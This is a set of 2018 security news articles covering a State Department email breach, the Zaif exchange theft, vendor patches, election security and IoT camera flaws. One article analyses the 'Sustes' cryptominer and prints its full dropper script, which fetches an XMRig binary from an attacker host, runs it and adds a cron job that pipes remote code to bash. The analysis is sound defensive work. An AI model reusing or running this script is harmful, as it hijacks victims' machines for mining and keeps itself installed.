In the final stages of communication between an individual and a company, a comparison of early emails and those received later can reveal differences. These differences indicate a scammer has entered the conversation under the guise of a professional. Verification through multiple channels is the safest route.

A scammer will also place a high amount of pressure on a homebuyer to wire their money. Homebuyers in the final stages of transfer are advised to look closely at the information exchanged between them and the vendor to ensure its validity. A lax attitude toward detail can leave a person open to attack.

However, these innocent people don’t have to fall into the same old traps. Everyone should commit themselves to an awareness of common scamming techniques and illegal practices. Before purchasing a home, potential buyers would benefit by educating themselves about the latest scams in circulation by criminals.

Assessing the Danger
According to a 2017 report by the FBI, almost $1 billion was diverted or nearly diverted from real estate transactions — up by a significant margin from the year prior. This enormous sum of money speaks to the severity of the problem and its relevance to homebuyers today.

As they work through the final stages of a real estate transaction, buyers must remain diligent. A lack of interest in the proceedings can spell the difference between money lost and money saved. With a transaction as important as property exchange, anything less than total attention is inviting trouble.

It’s only through awareness and caution that citizens can protect themselves and their loved ones from the dangers of fraudulent activity.


US State Department confirms data breach to unclassified email system
21.9.2018 securityaffairs
BigBrothers

The US State Department confirmed that hackers breached one of its email systems, the attack potentially exposed personal information of some of its employees.
The incident seems to have affected less than 1% of employee inboxes, 600-700 employees out of 69,000 people.

“The Department recently detected activity of concern in its unclassified email system, affecting less than 1 per cent of employee inboxes. Like any large organization with a global presence, we know the Department is a constant target for cyber attacks,” states the US State Department.

“We have not detected activity of concern in the Department’s classified email system. We determined that certain employees’ personally identifiable information (PII) may have been exposed. We have already notified those employees.”

The security breach affected an unclassified email system at the State Department, the news of the hack came to light after Politico obtained a “Sensitive but Unclassified” notice about the incident.

“This is an ongoing investigation, and we are working with partner agencies, as well as the private sector service provider, to conduct a full assessment.” a State Department spokesperson told Politico.

“We will reach out to any additional impacted employees as needed.”

After the Agency noticed the “suspicious activity” in its email system notified the incident to a number of employees whose personal information may have been compromised.

US State Department didn’t reveal which kind of data had been accessed by attackers, at the time of writing we only know that no classified information had been exposed.

The Agency claimed it took steps to secure its system, and it is offering three years of credit and identity theft monitoring to the affected employees.

A group of senators wrote to Secretary of State Mike Pompeo last week raising concerns that the department did not meet federal standards for cybersecurity and questioning its resilience to cyber attacks.

“Sens. Ron Wyden (D-Ore.), Rand Paul (R-Ky.), Ed Markey (D-Mass.), Jeanne Shaheen (D-N.H.) and Cory Gardner (R-Colo.) asked Pompeo for an update on what the State Department has done to address its “high risk” designation, and how many cyberattacks the department had been subject to abroad in the last three years.” reported TheHill.


Sustes Malware: CPU for Monero
21.9.2018 securityaffairs
Virus

Sustes Malware doesn’t infect victims by itself, but it is spread via brute-force activities with special focus on IoT and Linux servers.
Today I’d like to share a simple analysis based on a fascinating threat that I like to call Sustes (you will see name genesis in a bit).

Everybody knows Monero cryptocurrency and probably everybody knows that it has built upon privacy, by meaning It’s not that simple to figure out Monero wallet balance. Sustes (Mr.sh) is a nice example of Pirate-Mining and even if it’s hard to figure out its magnitude, since the attacker built-up private pool-proxies, I believe it’s interesting to fix wallet address in memories and to share IoC for future Protection. So, let’s have a closer look at it.
sustes

Monero stops you trying to check wallet balance
Sustes Malware doesn’t infect victims by itself (it’s not a worm) but it is spread over the exploitation and brute-force activities with special focus on IoT and Linux servers.
The initial infection stage comes from a custom wget (http:\/\/192[.]99[.]142[.]226[:]8220\/mr.sh ) directly on the victim machine followed by a simple /bin/bash mr.sh.
The script is a simple bash script which drops and executes additional software with a bit of spicy. The following code represents the mr.sh content as a today (ref. blog post date).
#!/bin/bash
mkdir /var/tmp
chmod 777 /var/tmp
pkill -f getty
netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
pkill -f /usr/bin/.sshd
rm -rf /var/tmp/j*
rm -rf /tmp/j*
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*
chmod 777 /var/tmp/sustes
ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
ps ax | grep /tmp/ | grep -v grep | grep -v 'sustes\|sustes\|ppl' | awk '{print $1}' | xargs kill -9
ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'sustes\|sustes\|ppl' | awk '{print $1}' | xargs kill -9
DIR="/var/tmp"
if [ -a "/var/tmp/sustes" ]
then
if [ -w "/var/tmp/sustes" ] && [ ! -d "/var/tmp/sustes" ]
then
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum /var/tmp/sustes | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "sustes OK"
;;
*)
echo "sustes wrong"
pkill -f wc.conf
pkill -f sustes
sleep 4
;;
esac
fi
echo "P OK"
else
DIR=$(mktemp -d)/var/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
else
if [ -d "/var/tmp" ]
then
DIR="/var/tmp"
fi
echo "P NOT EXISTS"
fi
if [ -d "/var/tmp/sustes" ]
then
DIR=$(mktemp -d)/var/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget -O";
fi
f2="192.99.142.226:8220"

downloadIfNeed()
{
if [ -x "$(command -v md5sum)" ]
then
if [ ! -f $DIR/sustes ]; then
echo "File not found!"
download
fi
sum=$(md5sum $DIR/sustes | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "sustes OK"
;;
*)
echo "sustes wrong"
sizeBefore=$(du $DIR/sustes)
if [ -s /usr/bin/curl ];
then
WGET="curl -k -o ";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget --no-check-certificate -O ";
fi
#$WGET $DIR/sustes https://transfer.sh/wbl5H/sustes
download
sumAfter=$(md5sum $DIR/sustes | awk '{ print $1 }')
if [ -s /usr/bin/curl ];
then
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustes` > $DIR/var/tmp.txt
fi
;;
esac
else
echo "No md5sum"
download
fi
}

download() {
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/sustes3 | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "sustes OK"
cp $DIR/sustes3 $DIR/sustes
;;
*)
echo "sustes wrong"
download2
;;
esac
else
echo "No md5sum"
download2
fi
}

download2() {
if [ `getconf LONG_BIT` = "64" ]
then
$WGET $DIR/sustes http://192.99.142.226:8220/xm64
fi

if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/sustes | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "sustes OK"
cp $DIR/sustes $DIR/sustes3
;;
*)
echo "sustes wrong"
;;
esac
else
echo "No md5sum"
fi
}

judge() {
if [ ! "$(netstat -ant|grep '158.69.133.20\|192.99.142.249\|202.144.193.110'|grep 'ESTABLISHED'|grep -v grep)" ];
then
ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid
do
kill -9 $procid
done
downloadIfNeed
touch /var/tmp/123
pkill -f /var/tmp/java
pkill -f w.conf
chmod +x $DIR/sustes
$WGET $DIR/wc.conf http://$f2/wt.conf
nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &
sleep 5
else
echo "Running"
fi
}

judge2() {
if [ ! "$(ps -fe|grep '/var/tmp/sustes'|grep 'wc.conf'|grep -v grep)" ];
then
downloadIfNeed
chmod +x $DIR/sustes
$WGET $DIR/wc.conf http://$f2/wt.conf
nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &
sleep 5
else
echo "Running"
fi
}

if [ ! "$(netstat -ant|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
then
judge2
else
judge
fi

if crontab -l | grep -q "192.99.142.226:8220"
then
echo "Cron exists"
else
crontab -r
echo "Cron not found"
LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
fi
rm -rf /var/tmp/jrm
rm -rf /tmp/jrm
pkill -f 185.222.210.59
pkill -f 95.142.40.81
pkill -f 192.99.142.232
chmod 777 /var/tmp/sustes
crontab -l | sed '/185.222.210.59/d' | crontab -
view rawmr hosted with ❤ by GitHub
An initial connection-check wants to take down unwanted software on the victim side (awk ‘{print $7}’ | sed -e “s/\/.*//g”) taking decisions upon specific IP addresses. It filters PID from connection states and it directly kills them (kill -9). The extracted attacker’s unwanted communications are the following ones:

103[.]99[.]115[.]220 (Org: HOST EDU (OPC) PRIVATE LIMITED, Country: IN)
104[.]160[.]171[.]94 (Org: Sharktech Country: USA)
121[.]18[.]238[.]56 (Org: ChinaUnicom, Country: CN)
170[.]178[.]178[.]57 (Org: Sharktech Country: USA)
27[.]155[.]87[.]59 (Org: CHINANET-FJ Country: CN)
52[.]15[.]62[.]13 (Org: Amazon Technologies Inc., Country: USA)
52[.]15[.]72[.]79 (Org: HOST EDU (OPC) PRIVATE LIMITED, Country: IN)
91[.]236[.]182[.]1 (Org: Brillant Auto Kft, Country: HU)
A second check comes from “command lines arguments”. Sustes “greps” to search for configuration files (for example: wc.conf and wq.conf and wm.conf) then it looks for software names such as sustes (here we go !) and kills everything matches the “grep”. The script follows by assigning to f2 variable the dropping website (192[.]99[.]142[.]226:8220) and later-on it calls “f2” adding specific paths (for example: /xm64 and wt.conf) in order to drop crafted components. MR.sh follows by running the dropped software with configuration file as follows:
nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &
MR.SH ends up by setting a periodic crontab action on dropping and executing itself by setting up:

crontab -l 2>/dev/null; echo “* * * * * $LDR http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1”
Following the analysis and extracting the configuration file from dropping URL we might observe the Monero wallet addresses and the Monero Pools used by attacker. The following wallets (W1, W2, W3) were found.

W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
Quick analyses on the used Monero pools took me to believe the attacker built up a custom and private (deployed on private infrastructures) Monero pool/proxies, for such a reason I believe it would be nice to monitor and/or block the following addresses:
158[.]69[.]133[.]20 on port 3333
192[.]99[.]142[.]249 on port 3333
202[.]144[.]193[.]110 on port 3333
The downloaded payload is named sustes and it is a basic XMRIG, which is a well-known opensource miner. In this scenario, it is used to make money at the expense of computer users by abusing the infected computer to mine Monero, a cryptocurrency. The following image shows the usage strings as an initial proof of software.

sustes
XMRIG prove 1
Many people are currently wondering what is the sustes process which is draining a lot of PC resources (for example: here, here and here ) …. now we have an answer: it’s an unwanted Miner. :D.

Hope you had fun

Further details including the IoC area available at:

https://marcoramilli.blogspot.com/2018/09/sustes-malware-cpu-for-monero.html


Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange
21.9.2018 securityaffairs
Cryptocurrency

Cybercriminals have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies from the Japanese digital currency exchange Zaif exchange.
According to the Tech Bureau Corp., a Japanese cryptocurrency firm, hackers have compromised its Zaif exchange and have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies, including Bitcoin, Monacoin, and Bitcoin Cash.

The stole digital currencies included roughly 2.2 billion yen belonged to Tech Bureau and 4.5 billion belonged to its clients.

The hacked have taked the control of the exchange for a couple of hours on Sept. 14, and illegally transferred coins form the “hot wallet” of the exchange to wallets under their control.

“Japanese cryptocurrency firm Tech Bureau Corp said about $60 million in digital currencies were stolen from its exchange, highlighting the industry’s vulnerability despite recent efforts by authorities to make it more secure.” reported the Reuters.

Three days later, operators at the exchange noticed server problems and publicly disclosed the hack on Sept. 18.

The Tech Bureau took offline the exchange and sold to Fisco Ltd the majority ownership for a 5 billion yen ($44.59 million) investment that would be used to replace the digital currencies stolen from client accounts.

“Documents seen by Reuters on Thursday showed Japan’s Financial Services Agency would conduct emergency checks on cryptocurrency exchange operators’ management of customer assets, following the theft. FSA officials were not immediately available for comment.” continues the Reuters.

This is the second hack suffered by a Japan’s crypto exchange this year, earlier January Japan-based digital exchange Coincheck was hacked and crooks stole$530 million in digital coins.

Earlier this year, a problem at the Zaif exchange allowed some people to buy cryptocurrencies without paying.


Japan is considered a global leaked in cryptocurrency technologies, the Bitcoin could be used for payment in the country since April 2017 major retailers accept this kind of payments.

Experts believe that the cyber heist will affect the FSA’s ongoing regulatory review of the cryptocurrency industry.

Last year Japan became the first country to regulate cryptocurrency exchanges, they have to register with FSA and required reporting and other responsibilities.

Anyway, the incidents demonstrate that the level of security of exchanges has to be improved.


Cisco fixes Remote Code Execution flaws in Webex Network Recording Player
21.9.2018 securityaffairs
Vulnerebility

Cisco released security patches to fix RCE flaws in the Webex Network Recording Player for Advanced Recording Format (ARF).
Cisco released security patches to address vulnerabilities in the Webex Network Recording Player for Advanced Recording Format (ARF) (CVE-2018-15414, CVE-2018-15421, and CVE-2018-15422) that could be exploited by an unauthenticated, remote attacker to execute arbitrary code on a vulnerable system

The Webex Meetings Server is a collaboration and communications solution that can be deployed on a private cloud and which manages the Webex Meetings Suite services and Webex Meetings Online hosted multimedia conferencing solutions.

The Meetings services allow customers to record meetings and store them online or in an ARF format or on a local computer, in WRF format.

The relative player Network Recording Player can be installed either automatically when a user accesses a recording file hosted on a Webex Meetings Suite site or manually by downloading it from the Webex site.

The lack of proper validation for the Webex recording files is the root cause of the vulnerabilities that could allow unauthenticated, remote attacker to execute arbitrary code on the target machine.

“Multiple vulnerabilities in the Cisco Webex Network Recording Player for Advanced Recording Format (ARF) could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system.” reads the security advisory published by Cisco.

“The vulnerabilities are due to improper validation of Webex recording files. An attacker could exploit these vulnerabilities by sending a user a link or email attachment containing a malicious file and persuading the user to open the file in the Cisco Webex Player. A successful exploit could allow the attacker to execute arbitrary code on an affected system.”


An attacker could exploit the flaw by tricking victims into opening a malicious file in the Cisco Webex Player, the file could be sent via email as an attachment or through a link in the content referencing it.

The vulnerabilities affect the following ARF recording players:

Cisco Webex Meetings Suite (WBS32) – Webex Network Recording Player versions prior to WBS32.15.10
Cisco Webex Meetings Suite (WBS33) – Webex Network Recording Player versions prior to WBS33.3
Cisco Webex Meetings Online – Webex Network Recording Player versions prior to 1.3.37
Cisco Webex Meetings Server – Webex Network Recording Player versions prior to 3.0MR2
Each version of the Webex Network Recording Players for Windows, OS X, and Linux is affected by at least one of the issues.

The following Network Recording Player updates address the vulnerabilities:

Meetings Suite (WBS32) – Player versions WBS32.15.10 and later and Meetings Suite (WBS33) – Player versions WBS33.3 and later;
Meetings Online – Player versions 1.3.37 and later; and Meetings Server – Player versions 3.0MR2 and later.
Cisco warns that there are no known workarounds for these issues.

“The Cisco Webex Network Recording Player (for .arf files) will be automatically upgraded to the latest, non-vulnerable version when users access a recording file that is hosted on a Cisco Webex Meetings site that contains the versions previously specified,” concludes the Cisco advisory.


Adobe Patches Code Execution, Other Flaws in Acrobat and Reader
20.9.2018 securityweek
Vulnerebility

Updates released on Wednesday by Adobe for the Windows and macOS versions of Acrobat and Reader address a total of 7 vulnerabilities, including a critical flaw that can allow arbitrary code execution.

The security holes affect Acrobat DC and Acrobat Reader DC (continuous track) 2018.011.20058 and earlier versions; Acrobat 2017 and Acrobat Reader 2017 (classic 2017 track) 2017.011.30099 and earlier versions; and Acrobat DC and Acrobat Reader DC (classic 2015 track) 2015.006.30448 and earlier versions.

The most serious of the flaws, tracked as CVE-2018-12848 and classified as “critical,” is an out-of-bounds write issue that allows arbitrary code execution. This was one of the four vulnerabilities reported to Adobe by Omri Herscovici, research team leader at Check Point Software Technologies.

The other bugs have been described by Adobe as out-of-bounds read issues that can lead to information disclosure. These have been assigned an “important” severity rating.

Cyberllum Technologies reported one of the flaws and an anonymous researcher informed Adobe of two flaws via Trend Micro’s Zero Day Initiative (ZDI).

Adobe is not aware of any malicious exploitation and, based on the priority rating assigned to the patches, it does not expect to see exploits any time soon.

The Acrobat and Reader patches come just one week after Adobe released its regular Patch Tuesday updates for September 2018, which resolved 10 vulnerabilities in Flash Player and ColdFusion.

Adobe also released an update for Photoshop CC recently to patch two critical remote code execution vulnerabilities.


Symantec Launches Free Election Security Service
20.9.2018 securityweek
IT

Symantec on Tuesday announced the launch of a new service that aims to make elections more secure by helping candidates and political organizations improve their security posture and detect fake websites.

With midterm elections coming up in the United States, tech companies and government agencies have launched various products and initiatives aimed at improving election security.

The threat is not just theoretical. Microsoft revealed last month that it had spotted and disrupted several election-related domains apparently set up by a Russia-linked threat actor.

Symantec has now also joined the list of companies offering election-related solutions with a free service. The main tool is Project Dolphin, an anti-phishing service that leverages Symantec technology and the cybersecurity firm’s massive telemetry to discover spoofed versions of legitimate websites.

According to the company, political candidates and campaigns can sign up and they will be notified if Symantec discovers a fake version of their website. While the service is targeted at political campaigns, it can be used for free by anyone interested in finding spoofed versions of their site.

Symantec told SecurityWeek that fake websites are identified based on domain names, page content or code stolen from the targeted site, and various other technologies and methods.

“Image analysis is particularly effective, using Deep Learning image recognition techniques to create a ‘fingerprint’ of the legitimate website which will then recognize it elsewhere on the internet,” Symantec explained. “The success of a phishing attack is dependent on the victim believing they are seeing a legitimate webpage. Attacks can’t look like and not look like the targeted page at the same time, so cybercriminals have their hands tied in trying to defeat this technology.”

The telemetry leveraged by Project Dolphin comes from a number of sources, including 2.4 billion emails and 1.8 billion web requests the company sees every day, and data collected from 175 million business and consumer endpoints. In addition, Symantec’s so-called “spiders” crawl the web to harvest telemetry on both good and bad sites.

The Dolphin Project is not the only resource available as part of the new election security service. Symantec also provides election security best practices for poll workers, voters and government officials; training videos on how to spot and block tampering attempts; aggregated news; and blogs containing analysis, tips and other relevant information.


Georgia's Use of Electronic Voting Machines Allowed for Midterms
20.9.2018 securityweek
BigBrothers

Judge Amy Totenberg ruled Monday that the state of Georgia's existing plans for the midterm elections to be conducted via some 27,000 Diebold AccuVote DRE touchscreen voting machines must stand. Her remarks, however, suggest that this should be the last time.

Plaintiffs, comprising the Coalition for Good Governance and citizens of Georgia, had filed a Motion for Preliminary Injunction against the Secretary of State for Georgia, Brian Kemp, in an attempt to force a switch to paper-based voting in time for the November elections. The primary argument is that the direct-recording election (DRE) machines to be used cannot produce a paper-based audit trail to verify accurate elections.

This coupled with the exposure of the registration details of 6.7 million Georgia voters on an unprotected internet-facing database, repeated demonstrations that such voting machines can be hacked, federal government advice that audit trails are necessary, and the constitutional right for citizens to vote was the basis of the plaintiffs' argument.

The Secretary of State's response, while insisting that the machines are secure, was primarily focused on the cost, lack of time, and potential confusion that such a late switch could cause.

Judge Totenberg ultimately agreed with the defendants and denied the plaintiff's motion -- but her concluding remarks demand that the state change its attitude in the future. "The State's posture in this litigation -- and some of the testimony and evidence presented -- indicated that the Defendants and State election officials had buried their heads in the sand," she wrote.

She indicated that she is not happy withc the way the state handled "the ramifications of the major data breach and vulnerability at the Center for Election Services" and "a host of serious security vulnerabilities permitted by their outdated software and system operations."

Nor was she happy with the way the state presented its case. "Defendants will fail to address that reality if they demean as paranoia the research-based findings of national cybersecurity engineers and experts in the field of elections." In its response to the Motion, the state had dismissed the plaintiffs' concerns as 'paranoia'.

Furthermore, reading between the lines of her concluding remarks, she intimates that she expects the case to come back before future elections, says that she will insist "on further proceedings moving on an expedited schedule", and concludes, "The 2020 elections are around the corner. If a new balloting system is to be launched in Georgia in an effective manner, it should address democracy's critical need for transparent, fair, accurate, and verifiable election processes that guarantee each citizen's fundamental right to cast an accountable vote."

Robert A McGuire, lead attorney for Coalition for Good Governance, expressed disappointment in the ruling, but confirmed that the case will continue. "We will continue to press these voting rights claims, and we fully expect to prevail in the end," he commented.

Bruce P. Brown, Atlanta attorney for the Coalition, added, "Judge Totenberg's decision is broadly consistent with the positions that the Coalition is taking in the case -- particularly the urgent need for Georgia, as soon as feasible, to switch to paper ballots."

Morrison & Foerster partner David Cross, attorney for the citizens of Georgia among the plaintiffs, agrees. "We read the decision as essentially saying it's too late for something at this point, but for the 2020 elections, there will be a change."

Cross told SecurityWeek, "Although the court denied the preliminary injunction, it finds that the current system is critically unsecure and that those entrusted with securing the election are remarkably unqualified and ill-informed about election security. The court emphasizes that our case will proceed expeditiously and finds that we ultimately are likely to win on the merits, which means the state will have to adopt a new, secure system before the 2020 elections. Ironically, it seems the court had little confidence in the state's ability to implement paper ballots now because of the ineptitude that certain election officials exhibited in this case."

Marilyn Marks, the Executive Director of Coalition for Good Governance, said, "The Secretary of State Kemp, the State Election Board, and the bi-partisan Fulton County Election Board refused to act in response to serious and repeated warnings from Congress, federal agencies, National Academy of Science and scores of expert voting system computer scientists that the paperless system is unfit for conducting public elections."

In 'Securing the Vote: Protecting American Democracy', compiled in January 2017 and recently published as a paperback and online, The National Academies warn "According to assessments by members of the U.S. Intelligence Community, actors sponsored by the Russian government 'obtained and maintained access to elements of multiple US state or local electoral boards.' While the full extent and impact of these activities is not known and our understanding of these events is evolving, there is little doubt that these efforts represented an assault on the American system of representative democracy."

One of the recommendations from the Academies is that "Voting machines that do not provide the capacity for independent auditing (e.g., machines that do not produce a voter-verifiable paper audit trail) should be removed from service as soon as possible." Georgia's Diebold AccuVote systems fall within this category.


Swiss, Russian FMs to Meet Next Week on Spy Row
20.9.2018 securityweek
CyberSpy

Switzerland's foreign minister said Monday that he will meet his Russian counterpart next week after details emerged of alleged attempts by two Russian spies to hack sensitive Swiss targets.

Swiss officials have said that Russian agents, arrested in the Netherlands earlier this year, launched separate cyber attacks on the Spiez laboratory in Bern and the Lausanne office of the World Anti-Doping Agency (WADA).

The lab, which does analytical work for the Hague-based Organisation for the Prohibition of Chemical Weapons (OPCW), was investigating the poisoning of Russian double agent Sergei Skripal in Britain.

WADA for its part has been a thorn in Moscow's side for several years over drug cheating in Russian sport.

Switzerland's foreign minister Ignazio Cassis told public radio broadcaster SRF that he will meet his Russian counterpart Sergei Lavrov next week to discuss what he called the "escalation" of Russian espionage on Swiss soil.

Foreign ministry spokesman Pierre-Alain Eltschinger told AFP that the meeting will take place in New York, on the sidelines of the United Nations General Assembly.

"Activities by intelligence agencies happen daily, not just by Russia but by other states," Cassis said.

"But there is now a certain escalation with Russia," he added.

"We've had various bilateral contacts at different levels this year to clearly state that we will not tolerate such activities in Switzerland."

Cassis also said that Switzerland had in recent weeks denied accreditation to "certain Russian diplomats".

Lavrov has condemned reports that Moscow's spies targeted the Spiez lab, saying he could not believe the arrests would not have been picked up at the time by the media.


iOS 12 Brings Patches for 16 Security Vulnerabilities
20.9.2018 securityweek
iOS

Apple this week officially released iOS 12, which patches various vulnerabilities in the mobile operating system (OS) and brings improved performance and other enhancements.

The tech giant also pushed updates for Apple TV 4K and Apple TV (4th generation) and Apple Watch Series 1 and later, with the release of tvOS 12 and watchOS 5. Safari 12 and Apple Support 2.4 for iOS were also released this week.

A total of 16 vulnerabilities were addressed with the release of iOS 12, most of which impact only iPhone 5s and later, iPad Air and later, and iPod touch 6th generation.

Tracked as CVE-2018-5383, an input validation issue in Bluetooth could allow an attacker in a privileged network position to intercept Bluetooth traffic. It impacts iPhone SE, iPhone 6s, iPhone 6s Plus, iPhone 7, iPhone 7 Plus, iPad Mini 4, 12.9-inch iPad Pro 1st generation, 12.9-inch iPad Pro 2nd generation, 10.5-inch iPad Pro, 9.7-inch iPad Pro, iPad 5th generation, and iPod Touch 6th generation.

The remaining flaws affect components such as Accounts, Core Bluetooth, CoreMedia, IOMobileFrameBuffer, iTunes Store, Kernel, Messages, Notes, Safari, SafariViewController, Security, Status Bar, and Wi-Fi.

Some of these flaws could allow an app to read a persistent account identifier, execute arbitrary code with system privileges, learn information about the current camera view before being granted camera access, or read restricted memory.

Bugs in Messages, Notes, and Safari could allow a local user to discover a user’s deleted messages, notes, or the websites a user has visited. A flaw in iTunes Store could be exploited by an attacker in a privileged network position to spoof password prompts in the iTunes Store.

One other flaw in Safari could prevent a user from deleting browsing history items. Other flaws could allow malicious websites to exfiltrate autofilled data in Safari or could lead to address bar spoofing when visiting malicious websites.

Apple also removed the RC4 cryptographic algorithm from the platform, to prevent attackers from exploiting weaknesses in it, and addressed an issue where anyone with physical access to an iOS device could determine the last used app from the lock screen.

tvOS 12 patches 5 vulnerabilities in Bluetooth, iTunes Store, Kernel, Safari, and Security, while watchOS 5 addressed 4 bugs in iTunes Store, Kernel, Safari, and Security.

Available for macOS Sierra 10.12.6, and macOS High Sierra 10.13.6, Safari 12 patches 3 flaws, while Apple Support 2.4 for iOS addresses one bug in Analytics, which could allow an attacker in a privileged network position to intercept analytics data sent to Apple.


Critical Vulnerability Impacts Hundreds of Thousands of IoT Cameras
20.9.2018 securityweek
IoT

A critical vulnerability in NUUO software could allow attackers to remotely view video feeds and tamper with the recordings of hundreds of thousands of surveillance cameras, Tenable reveals.

The bug, which Tenable researchers called Peekaboo, supposedly impacts over 100 brands and 2,500 different models of cameras that are integrated with NUUO’s software. Providing access to usernames and passwords, the vulnerability could be exploited to manipulate cameras and take them offline.

NUUO’s software and devices are widely used for web-based video monitoring and surveillance in multiple industries, including retail, transportation, education, government, and banking. The vulnerability was discovered in NVRMini 2, a network-attached storage device and network video recorder.

The vulnerability, an unauthenticated stack buffer overflow, could lead to remote code execution. Tracked as CVE-2018-1149, it features a CVSSv2 Base score of 10.0.

“Once exploited, Peekaboo would give cybercriminals access to the control management system (CMS), exposing the credentials for all connected video surveillance cameras. Using root access on the NVRMini2 device, cybercriminals could disconnect the live feeds and tamper with security footage,” Tenable says.

The bug was found in NVRMini 2 firmware versions older than 3.9.0. Despite being publicly revealed, the flaw remains unpatched, though a fix is in the works.

“In the meantime, users are urged to control and restrict access to their NUUO NVRMini2 deployments and limit this to legitimate users from trusted networks only. Owners of devices connected directly to the internet are especially at risk, as potential attackers can target them directly over the internet. Affected end users must disconnect these devices from the internet until a patch is released,” Tenable says.

The issue resides in the use of an open-source web server with support for executable binaries via the common gateway interface (CGI) protocol. One of the CGI binaries, 'cgi_system', handles various commands and actions that require the user be authenticated, but the cookie parameter’s session ID size isn’t checked during authentication, thus allowing for a stack buffer overflow in the sprintf function.

The vulnerability can result in remote code execution with “root” or administrator privileges, Tenable’s security researchers discovered. Proof-of-concept (PoC) code to demonstrate the bug has been published on GitHub.

In addition to this security flaw, Tenable discovered a backdoor in leftover debug code. Tracked as CVE-2018-1150, the vulnerability has a CVSSv2 Base Score of 4.0.

The backdoor is enabled if a file named /tmp/moses exists, the researchers explain. The backdoor can be used to list all user accounts on the system and also allows the change of any account’s password. An attacker abusing the bug could not only view the camera feeds and CCTV recordings, but could also remove a camera from the system entirely.

“This is a very odd artifact. We weren’t able to determine if it’s leftover development code or if it was maliciously added. To be able to activate and utilize the backdoor, an attacker would need to be able to create the file “/tmp/moses,” so the attack would require some form of access or need to be combined with another exploit. Its existence and lack of obfuscation in the code is the real mystery,” Tenable says.


Destructive Xbash Linux Malware Targets Enterprise Intranets
20.9.2018 securityweek
Virus

A newly discovered piece of Linux malware that features both ransomware and crypto-currency mining capabilities appears designed to target enterprise intranets, Palo Alto Networks security researchers say.

Dubbed Xbash and believed to be tied to the Iron Group, a threat actor known for previous ransomware attacks, the malware can target both Linux and Windows servers.

It contains a Python class that allows it to find IP addresses on a subnet and scan the ports on these IPs, likely to spread to the local network. In addition to self-propagating capabilities, the malware contains functionality not yet implemented that could allow it to spread fast within an organization’s network.

The servers that provide services internally on an enterprise network are more likely to be configured with weak credentials or to be unprotected compared to those accessible over the public web.

“We believe that is the main motivation of Xbash’s Intranet scanning code. If events like WannaCry and NotPetya are any guide, this intranet functionality could make Xbash even more devastating once it’s enabled,” Palo Alto Networks says.

